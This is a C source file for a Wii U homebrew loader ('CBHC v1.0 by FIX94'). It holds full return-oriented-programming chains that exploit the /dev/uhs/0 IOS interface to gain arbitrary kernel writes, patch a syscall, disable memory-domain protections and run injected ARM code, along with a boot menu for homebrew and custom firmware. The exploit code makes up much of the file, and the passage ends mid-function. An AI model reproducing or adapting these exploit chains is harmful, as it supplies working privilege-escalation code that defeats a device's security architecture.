/* * Copyright (C) 2016 FIX94 * * This software may be modified and distributed under the terms * of the MIT license. See the LICENSE file for details. */ #include #include "types.h" #include "coreinit.h" #include "pad.h" #define CHAIN_START 0x1016AD40 #define SHUTDOWN 0x1012EE4C #define SIMPLE_RETURN 0x101014E4 #define SOURCE 0x01E20000 #define IOS_CREATETHREAD 0x1012EABC #define ARM_CODE_BASE 0x08134100 #define REPLACE_SYSCALL 0x081298BC /* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ #include "payload/arm_kernel_bin.h" #include "payload/arm_user_bin.h" /* ROP CHAIN STARTS HERE (0x1015BD78) */ static const int final_chain[] = { 0x101236f3, // 0x00 POP {R1-R7,PC} 0x0, // 0x04 arg 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR 0x68, // 0x0C stacksize 0x10101638, // 0x10 0x0, // 0x14 0x0, // 0x18 0x0, // 0x1C 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} 0x0, // 0x24 0x0, // 0x28 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x30 0x0, // 0x34 IOS_CREATETHREAD, // 0x38 0x1, // 0x3C 0x2, // 0x40 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE92D4010, // 0x4C value: PUSH {R4,LR} 0x0, // 0x50 0x10123a8b, // 0x54 POP {R3,R4,PC} 0x1, // 0x58 R3 must be 1 for the arbitrary write 0x0, // 0x5C 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x64 0x0, // 0x68 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) 0x0, // 0x70 0x0, // 0x74 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE1A04000, // 0x80 value: MOV R4, R0 0x0, // 0x84 0x10123a8b, // 0x88 POP {R3,R4,PC} 0x1, // 0x8C R3 must be 1 for the arbitrary write 0x0, // 0x90 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x98 0x0, // 0x9C 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) 0x0, // 0xA4 0x0, // 0xA8 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF 0x0, // 0xB8 0x10123a8b, // 0xBC POP {R3,R4,PC} 0x1, // 0xC0 R3 must be 1 for the arbitrary write 0x0, // 0xC4 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0xCC 0x0, // 0xD0 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) 0x0, // 0xD8 0x0, // 0xDC 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) 0x0, // 0xEC 0x10123a8b, // 0xF0 POP {R3,R4,PC} 0x1, // 0xF4 R3 must be 1 for the arbitrary write 0x0, // 0xF8 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x100 0x0, // 0x104 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) 0x0, // 0x10C 0x0, // 0x110 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE1A00004, // 0x11C value: MOV R0, R4 0x0, // 0x120 0x10123a8b, // 0x124 POP {R3,R4,PC} 0x1, // 0x128 R3 must be 1 for the arbitrary write 0x0, // 0x12C 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x134 0x0, // 0x138 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) 0x0, // 0x140 0x0, // 0x144 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY 0x0, // 0x154 0x10123a8b, // 0x158 POP {R3,R4,PC} 0x1, // 0x15C R3 must be 1 for the arbitrary write 0x0, // 0x160 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x168 0x0, // 0x16C 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) 0x0, // 0x174 0x0, // 0x178 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0x00000000, // 0x150 value: NOP 0x0, // 0x154 0x10123a8b, // 0x158 POP {R3,R4,PC} 0x1, // 0x15C R3 must be 1 for the arbitrary write 0x0, // 0x160 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x168 0x0, // 0x16C 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) 0x0, // 0x174 0x0, // 0x178 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 0x0, // 0x154 0x10123a8b, // 0x158 POP {R3,R4,PC} 0x1, // 0x15C R3 must be 1 for the arbitrary write 0x0, // 0x160 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x168 0x0, // 0x16C 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) 0x0, // 0x174 0x0, // 0x178 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0x1AFFFFFD, // 0x150 value: BNE clean_loop 0x0, // 0x154 0x10123a8b, // 0x158 POP {R3,R4,PC} 0x1, // 0x15C R3 must be 1 for the arbitrary write 0x0, // 0x160 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x168 0x0, // 0x16C 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) 0x0, // 0x174 0x0, // 0x178 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 0x0, // 0x154 0x10123a8b, // 0x158 POP {R3,R4,PC} 0x1, // 0x15C R3 must be 1 for the arbitrary write 0x0, // 0x160 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x168 0x0, // 0x16C 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) 0x0, // 0x174 0x0, // 0x178 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE1A03004, // 0x184 value: MOV R3, R4 0x0, // 0x188 0x10123a8b, // 0x18C POP {R3,R4,PC} 0x1, // 0x190 R3 must be 1 for the arbitrary write 0x0, // 0x194 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x19C 0x0, // 0x1A0 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) 0x0, // 0x1A8 0x0, // 0x1AC 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE8BD4010, // 0x184 value: POP {R4,LR} 0x0, // 0x188 0x10123a8b, // 0x18C POP {R3,R4,PC} 0x1, // 0x190 R3 must be 1 for the arbitrary write 0x0, // 0x194 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x19C 0x0, // 0x1A0 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) 0x0, // 0x1A8 0x0, // 0x1AC 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) 0x0, // 0x1BC 0x10123a8b, // 0x1C0 POP {R3,R4,PC} 0x1, // 0x1C4 R3 must be 1 for the arbitrary write 0x0, // 0x1C8 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x1D0 0x0, // 0x1D4 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) 0x0, // 0x1DC 0x0, // 0x1E0 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches 0x0, // 0x1E0 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) 0x0, // 0x1DC 0x0, // 0x1E0 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} ARM_CODE_BASE, // 0x1E8 our code destination address 0x0, // 0x1EC 0x0, // 0x1F0 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} 0x0, // 0x1F8 sizeof(arm_kernel_bin), // 0x1FC our code size 0x0, // 0x200 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} 0x01E40000, // 0x208 our code source location 0x08131D04, // 0x20C KERNEL_MEMCPY address 0x0, // 0x210 0x0, // 0x214 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) 0x0, 0x0, 0x101312D0, }; static const int second_chain[] = { 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination 0x0, // 0x08 0x0, // 0x0C 0x101063db, // 0x10 POP {R1,R2,R5,PC} 0x01E30000, // 0x14 source sizeof(final_chain), // 0x18 length 0x0, // 0x1C 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} 0x0, // 0x24 0x0, // 0x28 0x101236f3, // 0x2C POP {R1-R7,PC} 0x0, // 0x30 arg 0x101001DC, // 0x34 stackptr 0x68, // 0x38 stacksize 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} 0x0, // 0x40 0x0, // 0x44 0x0, // 0x48 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} 0x0, // 0x50 0x0, // 0x54 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} 0x0, // 0x5C 0x0, // 0x60 IOS_CREATETHREAD, // 0x64 0x1, // 0x68 priority 0x2, // 0x6C flags 0x0, // 0x70 0x0, // 0x74 0x101063db, // 0x78 POP {R1,R2,R5,PC} 0x0, // 0x7C -(0x240 + 0x18 + 0xF000), // 0x80 stack offset 0x0, // 0x84 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} 0x0, 0x0, 0x0, 0x00110000 - 0x44, // 0x8C 0x00110010, // 0x90 0x0, // 0x94 0x0, // 0x98 0x0, // 0x9C 0x0, // 0xA0 0x0, // 0xA4 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} 0x0, 0x0, 0x1012EA68, // 0xAC stack pivot }; static void uhs_exploit_init(unsigned int coreinit_handle); static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val); static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vpad_handle); #define BUS_SPEED 248625000 #define SECS_TO_TICKS(sec) (((unsigned long long)(sec)) * (BUS_SPEED/4)) #define MILLISECS_TO_TICKS(msec) (SECS_TO_TICKS(msec) / 1000) #define MICROSECS_TO_TICKS(usec) (SECS_TO_TICKS(usec) / 1000000) #define usleep(usecs) OSSleepTicks(MICROSECS_TO_TICKS(usecs)) #define sleep(secs) OSSleepTicks(SECS_TO_TICKS(secs)) #define FORCE_SYSMENU (VPAD_BUTTON_ZL | VPAD_BUTTON_ZR | VPAD_BUTTON_L | VPAD_BUTTON_R) #define FORCE_HBL (VPAD_BUTTON_A | VPAD_BUTTON_B | VPAD_BUTTON_X | VPAD_BUTTON_Y) #define SD_HBL_PATH "/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf" static const char *verChar = "CBHC v1.0 by FIX94"; #define DEFAULT_DISABLED 0 #define DEFAULT_SYSMENU 1 #define DEFAULT_HBL 2 #define DEFAULT_CFW_IMG 3 #define DEFAULT_MAX 4 static const char *defOpts[DEFAULT_MAX] = { "DEFAULT_DISABLED", "DEFAULT_SYSMENU", "DEFAULT_HBL", "DEFAULT_CFW_IMG", }; static const char *bootOpts[DEFAULT_MAX] = { "Disabled", "System Menu", "Homebrew Launcher", "fw.img on SD Card", }; #define LAUNCH_SYSMENU 0 #define LAUNCH_HBL 1 #define LAUNCH_CFW_IMG 2 #define OSScreenClearBuffer(tmp) OSScreenClearBufferEx(0, tmp); OSScreenClearBufferEx(1, tmp); #define OSScreenPutFont(x, y, buf) OSScreenPutFontEx(0, x, y, buf); OSScreenPutFontEx(1, x, y, buf); #define OSScreenFlipBuffers() OSScreenFlipBuffersEx(0); OSScreenFlipBuffersEx(1); uint32_t __main(void) { unsigned int coreinit_handle; OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle); void (*DCStoreRange)(const void *addr, uint32_t length); OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); void (*OSExitThread)(int); OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread); unsigned int sysapp_handle; OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle); unsigned long long(*_SYSGetSystemApplicationTitleId)(int sysApp); OSDynLoad_FindExport(sysapp_handle,0,"_SYSGetSystemApplicationTitleId",&_SYSGetSystemApplicationTitleId); unsigned long long sysmenu = _SYSGetSystemApplicationTitleId(0); //set up default hbl path strcpy((void*)0xF5E70000,SD_HBL_PATH); unsigned int vpad_handle; OSDynLoad_Acquire("vpad.rpl", &vpad_handle); int(*VPADRead)(int controller, VPADData *buffer, unsigned int num, int *error); OSDynLoad_FindExport(vpad_handle, 0, "VPADRead", &VPADRead); int vpadError = -1; VPADData vpad; VPADRead(0, &vpad, 1, &vpadError); if(vpadError == 0) { if(((vpad.btns_d|vpad.btns_h) & FORCE_SYSMENU) == FORCE_SYSMENU) { // iosuhax-less menu launch backup code int(*_SYSLaunchTitleWithStdArgsInNoSplash)(unsigned long long tid, void *ptr); OSDynLoad_FindExport(sysapp_handle,0,"_SYSLaunchTitleWithStdArgsInNoSplash",&_SYSLaunchTitleWithStdArgsInNoSplash); _SYSLaunchTitleWithStdArgsInNoSplash(sysmenu, 0); OSExitThread(0); return 0; } else if(((vpad.btns_d|vpad.btns_h) & FORCE_HBL) == FORCE_HBL) { // original hbl loader payload return 0x01800000; } } unsigned int *pMEMAllocFromDefaultHeapEx; unsigned int *pMEMFreeToDefaultHeap; OSDynLoad_FindExport(coreinit_handle, 1, "MEMAllocFromDefaultHeapEx", &pMEMAllocFromDefaultHeapEx); OSDynLoad_FindExport(coreinit_handle, 1, "MEMFreeToDefaultHeap", &pMEMFreeToDefaultHeap); void*(*MEMAllocFromDefaultHeapEx)(int size, int align) = (void*)(*pMEMAllocFromDefaultHeapEx); void(*MEMFreeToDefaultHeap)(void *ptr) = (void*)(*pMEMFreeToDefaultHeap); void *pClient = MEMAllocFromDefaultHeapEx(0x1700,4); void *pCmd = MEMAllocFromDefaultHeapEx(0xA80,4); int(*FSInit)(void); void(*FSShutdown)(void); int(*FSAddClient)(void *pClient, int errHandling); int(*FSDelClient)(void *pClient); void(*FSInitCmdBlock)(void *pCmd); int(*FSWriteFile)(void *pClient, void *pCmd, const void *buffer, int size, int count, int fd, int flag, int errHandling); int(*FSCloseFile)(void *pClient, void *pCmd, int fd, int errHandling); OSDynLoad_FindExport(coreinit_handle, 0, "FSInit", &FSInit); OSDynLoad_FindExport(coreinit_handle, 0, "FSShutdown", &FSShutdown); OSDynLoad_FindExport(coreinit_handle, 0, "FSInitCmdBlock", &FSInitCmdBlock); OSDynLoad_FindExport(coreinit_handle, 0, "FSAddClient", &FSAddClient); OSDynLoad_FindExport(coreinit_handle, 0, "FSDelClient", &FSDelClient); OSDynLoad_FindExport(coreinit_handle, 0, "FSWriteFile", &FSWriteFile); OSDynLoad_FindExport(coreinit_handle, 0, "FSCloseFile", &FSCloseFile); unsigned int act_handle; OSDynLoad_Acquire("nn_act.rpl", &act_handle); unsigned int save_handle; OSDynLoad_Acquire("nn_save.rpl", &save_handle); void(*SAVEInit)(void); void(*SAVEShutdown)(void); void(*SAVEInitSaveDir)(unsigned char user); int(*SAVEOpenFile)(void *pClient, void *pCmd, unsigned char user, const char *path, const char *mode, int *fd, int errHandling); int(*SAVEFlushQuota)(void *pClient, void *pCmd, unsigned char user, int errHandling); void(*SAVERename)(void *pClient, void *pCmd, unsigned char user, const char *oldpath, const char *newpath, int errHandling); OSDynLoad_FindExport(save_handle, 0, "SAVEInit",&SAVEInit); OSDynLoad_FindExport(save_handle, 0, "SAVEShutdown",&SAVEShutdown); OSDynLoad_FindExport(save_handle, 0, "SAVEInitSaveDir",&SAVEInitSaveDir); OSDynLoad_FindExport(save_handle, 0, "SAVEOpenFile", &SAVEOpenFile); OSDynLoad_FindExport(save_handle, 0, "SAVEFlushQuota", &SAVEFlushQuota); OSDynLoad_FindExport(save_handle, 0, "SAVERename", &SAVERename); void(*nn_act_initialize)(void); unsigned char(*nn_act_getslotno)(void); void(*nn_act_finalize)(void); OSDynLoad_FindExport(act_handle, 0, "Initialize__Q2_2nn3actFv", &nn_act_initialize); OSDynLoad_FindExport(act_handle, 0, "GetSlotNo__Q2_2nn3actFv", &nn_act_getslotno); OSDynLoad_FindExport(act_handle, 0, "Finalize__Q2_2nn3actFv", &nn_act_finalize); FSInit(); nn_act_initialize(); unsigned char slot = nn_act_getslotno(); SAVEInit(); SAVEInitSaveDir(slot); FSAddClient(pClient, -1); FSInitCmdBlock(pCmd); int autoboot = -1; int iFd = -1; int i; for(i = 0; i < DEFAULT_MAX; i++) { SAVEOpenFile(pClient, pCmd, slot, defOpts[i], "r", &iFd, -1); if (iFd >= 0) { autoboot = i; FSCloseFile(pClient, pCmd, iFd, -1); break; } } if(autoboot < 0) { autoboot = DEFAULT_DISABLED; SAVEOpenFile(pClient, pCmd, slot, defOpts[DEFAULT_DISABLED], "w", &iFd, -1); if (iFd >= 0) FSCloseFile(pClient, pCmd, iFd, -1); } int launchmode = (autoboot > 0) ? (autoboot - 1) : LAUNCH_SYSMENU; int cur_autoboot = autoboot; void(*OSScreenInit)(); void(*OSScreenEnableEx)(int,int); unsigned int(*OSScreenGetBufferSizeEx)(unsigned int bufferNum); unsigned int(*OSScreenSetBufferEx)(unsigned int bufferNum, void * addr); OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenInit", &OSScreenInit); OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenEnableEx", &OSScreenEnableEx); OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenGetBufferSizeEx", &OSScreenGetBufferSizeEx); OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenSetBufferEx", &OSScreenSetBufferEx); unsigned int(*OSScreenClearBufferEx)(unsigned int bufferNum, unsigned int temp); OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenClearBufferEx", &OSScreenClearBufferEx); unsigned int(*OSScreenPutFontEx)(unsigned int bufferNum, unsigned int posX, unsigned int posY, const char * buffer); OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenPutFontEx", &OSScreenPutFontEx); unsigned int(*OSScreenFlipBuffersEx)(unsigned int bufferNum); OSDynLoad_FindExport(coreinit_handle, 0, "OSScreenFlipBuffersEx", &OSScreenFlipBuffersEx); OSScreenInit(); int screen_buf0_size = OSScreenGetBufferSizeEx(0); OSScreenSetBufferEx(0, (void *)0xF4000000); OSScreenSetBufferEx(1, (void *)0xF4000000 + screen_buf0_size); OSScreenEnableEx(1, 0); OSScreenEnableEx(1, 1); unsigned int padscore_handle; OSDynLoad_Acquire("padscore.rpl", &padscore_handle); void(*OSSleepTicks)(unsigned long long ticks); OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks",&OSSleepTicks); void(*WPADEnableURCC)(int enable); void(*KPADSetConnectCallback)(int chan, void *ptr); void*(*WPADSetSyncDeviceCallback)(void *ptr); void(*KPADShutdown)(void); OSDynLoad_FindExport(padscore_handle, 0, "WPADEnableURCC", &WPADEnableURCC); OSDynLoad_FindExport(padscore_handle, 0, "KPADSetConnectCallback", &KPADSetConnectCallback); OSDynLoad_FindExport(padscore_handle, 0, "WPADSetSyncDeviceCallback", &WPADSetSyncDeviceCallback); OSDynLoad_FindExport(padscore_handle, 0, "KPADShutdown",&KPADShutdown); //easly allows us callback without execute permission on other cores char(*WPADGetSpeakerVolume)(void); void(*WPADSetSpeakerVolume)(char); OSDynLoad_FindExport(padscore_handle, 0, "WPADGetSpeakerVolume", &WPADGetSpeakerVolume); OSDynLoad_FindExport(padscore_handle, 0, "WPADSetSpeakerVolume", &WPADSetSpeakerVolume); //enable wiiu pro controller connection WPADEnableURCC(1); //hachihachi instantly disconnects wiimotes normally KPADSetConnectCallback(0,NULL); KPADSetConnectCallback(1,NULL); KPADSetConnectCallback(2,NULL); KPADSetConnectCallback(3,NULL); char oriVol = WPADGetSpeakerVolume(); //WPAD_SYNC_EVT=0 is button pressed WPADSetSpeakerVolume(1); WPADSetSyncDeviceCallback(WPADSetSpeakerVolume); if(autoboot == DEFAULT_DISABLED) goto cbhc_menu; OSScreenClearBuffer(0); OSScreenPutFont(0, 0, verChar); OSScreenPutFont(0, 1, "Autobooting..."); OSScreenFlipBuffers(); //garbage read getButtonsDown(padscore_handle, vpad_handle); //see if menu is requested int loadMenu = 0; int waitCnt = 40; while(waitCnt--) { unsigned int btnDown = getButtonsDown(padscore_handle, vpad_handle); if((btnDown & VPAD_BUTTON_HOME) || WPADGetSpeakerVolume() == 0) { WPADSetSpeakerVolume(1); loadMenu = 1; break; } usleep(50000); } if(loadMenu == 0) goto doIOSUexploit; OSScreenClearBuffer(0); OSScreenPutFont(0, 0, verChar); OSScreenPutFont(0, 1, "Entering Menu..."); OSScreenFlipBuffers(); waitCnt = 30; while(waitCnt--) { getButtonsDown(padscore_handle, vpad_handle); usleep(50000); } cbhc_menu: ; int redraw = 1; int PosX = 0; int ListMax = 4; int clickT = 0; while(1) { unsigned int btnDown = getButtonsDown(padscore_handle, vpad_handle); if(WPADGetSpeakerVolume() == 0) { if(clickT == 0) clickT = 8; else { btnDown |= VPAD_BUTTON_A; clickT = 0; } WPADSetSpeakerVolume(1); } else if(clickT) { clickT--; if(clickT == 0) btnDown |= VPAD_BUTTON_DOWN; } if( btnDown & VPAD_BUTTON_DOWN ) { if(PosX+1 == ListMax) PosX = 0; else PosX++; redraw = 1; } if( btnDown & VPAD_BUTTON_UP ) { if( PosX <= 0 ) PosX = (ListMax-1); else PosX--; redraw = 1; } if( btnDown & VPAD_BUTTON_A ) { if(PosX == 3) { cur_autoboot++; if(cur_autoboot == DEFAULT_MAX) cur_autoboot = DEFAULT_DISABLED; redraw = 1; } else { launchmode = PosX; break; } } if(redraw) { OSScreenClearBuffer(0); OSScreenPutFont(0, 0, verChar); char printStr[64]; __os_snprintf(printStr,64,"%c Boot System Menu", 0 == PosX ? '>' : ' '); OSScreenPutFont(0, 1, printStr); __os_snprintf(printStr,64,"%c Boot Homebrew Launcher", 1 == PosX ? '>' : ' '); OSScreenPutFont(0, 2, printStr); __os_snprintf(printStr,64,"%c Boot fw.img on SD Card", 2 == PosX ? '>' : ' '); OSScreenPutFont(0, 3, printStr); __os_snprintf(printStr,64,"%c Autoboot: %s", 3 == PosX ? '>' : ' ', bootOpts[cur_autoboot]); OSScreenPutFont(0, 4, printStr); OSScreenFlipBuffers(); redraw = 0; } usleep(50000); } OSScreenClearBuffer(0); OSScreenFlipBuffers(); usleep(50000); doIOSUexploit: WPADSetSpeakerVolume(oriVol); KPADShutdown(); if(cur_autoboot != autoboot) SAVERename(pClient, pCmd, slot, defOpts[autoboot], defOpts[cur_autoboot], -1); SAVEFlushQuota(pClient, pCmd, slot, -1); FSDelClient(pClient); SAVEShutdown(); nn_act_finalize(); FSShutdown(); MEMFreeToDefaultHeap(pClient); MEMFreeToDefaultHeap(pCmd); OSScreenClearBuffer(0); OSScreenFlipBuffers(); memcpy((void*)0xF5E70100, &sysmenu, 8); *(volatile unsigned int*)0xF5E70120 = (launchmode == LAUNCH_CFW_IMG); DCStoreRange((void*)0xF5E70100, 0x40); int (*OSForceFullRelaunch)(void); OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); //for patched menu launch void (*SYSLaunchMenu)(void); OSDynLoad_FindExport(sysapp_handle, 0,"SYSLaunchMenu", &SYSLaunchMenu); int (*IOS_Open)(char *path, unsigned int mode); int (*IOS_Close)(int fd); OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node uhs_exploit_init(coreinit_handle); //! Init variables for the exploit //!------ROP CHAIN------- uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20); uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C); uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE); uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC} IOS_Close(dev_uhs_0_handle); if(launchmode == LAUNCH_HBL) return 0x01800000; //sysmenu or cfw if(launchmode == LAUNCH_CFW_IMG) OSForceFullRelaunch(); SYSLaunchMenu(); OSExitThread(0); return 0; } static unsigned int wpadToVpad(unsigned int buttons) { unsigned int conv_buttons = 0; if(buttons & WPAD_BUTTON_LEFT) conv_buttons |= VPAD_BUTTON_LEFT; if(buttons & WPAD_BUTTON_RIGHT) conv_buttons |= VPAD_BUTTON_RIGHT; if(buttons & WPAD_BUTTON_DOWN) conv_buttons |= VPAD_BUTTON_DOWN; if(buttons & WPAD_BUTTON_UP) conv_buttons |= VPAD_BUTTON_UP; if(buttons & WPAD_BUTTON_PLUS) conv_buttons |= VPAD_BUTTON_PLUS; if(buttons & WPAD_BUTTON_2) conv_buttons |= VPAD_BUTTON_X; if(buttons & WPAD_BUTTON_1) conv_buttons |= VPAD_BUTTON_Y; if(buttons & WPAD_BUTTON_B) conv_buttons |= VPAD_BUTTON_B; if(buttons & WPAD_BUTTON_A) conv_buttons |= VPAD_BUTTON_A; if(buttons & WPAD_BUTTON_MINUS) conv_buttons |= VPAD_BUTTON_MINUS; if(buttons & WPAD_BUTTON_HOME) conv_buttons |= VPAD_BUTTON_HOME; return conv_buttons; } static unsigned int wpadClassicToVpad(unsigned int buttons) { unsigned int conv_buttons = 0; if(buttons & WPAD_CLASSIC_BUTTON_LEFT) conv_buttons |= VPAD_BUTTON_LEFT; if(buttons & WPAD_CLASSIC_BUTTON_RIGHT) conv_buttons |= VPAD_BUTTON_RIGHT; if(buttons & WPAD_CLASSIC_BUTTON_DOWN) conv_buttons |= VPAD_BUTTON_DOWN; if(buttons & WPAD_CLASSIC_BUTTON_UP) conv_buttons |= VPAD_BUTTON_UP; if(buttons & WPAD_CLASSIC_BUTTON_PLUS) conv_buttons |= VPAD_BUTTON_PLUS; if(buttons & WPAD_CLASSIC_BUTTON_X) conv_buttons |= VPAD_BUTTON_X; if(buttons & WPAD_CLASSIC_BUTTON_Y) conv_buttons |= VPAD_BUTTON_Y; if(buttons & WPAD_CLASSIC_BUTTON_B) conv_buttons |= VPAD_BUTTON_B; if(buttons & WPAD_CLASSIC_BUTTON_A) conv_buttons |= VPAD_BUTTON_A; if(buttons & WPAD_CLASSIC_BUTTON_MINUS) conv_buttons |= VPAD_BUTTON_MINUS; if(buttons & WPAD_CLASSIC_BUTTON_HOME) conv_buttons |= VPAD_BUTTON_HOME; if(buttons & WPAD_CLASSIC_BUTTON_ZR) conv_buttons |= VPAD_BUTTON_ZR; if(buttons & WPAD_CLASSIC_BUTTON_ZL) conv_buttons |= VPAD_BUTTON_ZL; if(buttons & WPAD_CLASSIC_BUTTON_R) conv_buttons |= 